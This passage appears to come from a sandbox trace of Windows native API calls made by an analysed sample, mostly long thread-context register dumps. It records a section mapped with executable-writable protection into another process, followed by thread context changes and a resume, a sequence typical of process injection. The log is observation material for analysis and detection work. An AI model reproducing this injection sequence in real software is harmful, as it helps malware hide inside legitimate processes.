FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x2ac000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.375] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0137.375] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xe5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xe6000) returned 0x0 [0137.536] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xe5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x650000, SectionOffset=0x0, ViewSize=0xde6e8*=0xe6000) returned 0x0 [0137.549] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0137.553] NtClose (Handle=0x1a8) returned 0x0 [0137.553] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x4fff14, Ebx=0x2ac000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x4ffebc, Eip=0x6a2717, SegCs=0x23, EFlags=0x202, Esp=0x4ffea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.567] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0137.567] NtClose (Handle=0x1a0) returned 0x0 [0137.567] NtClose (Handle=0x1a4) returned 0x0 [0137.568] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1124, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0137.568] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0137.568] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0137.568] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x2c7000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0137.568] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0137.571] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1128) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0137.571] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0137.571] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x21b0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0137.576] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2c7000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, 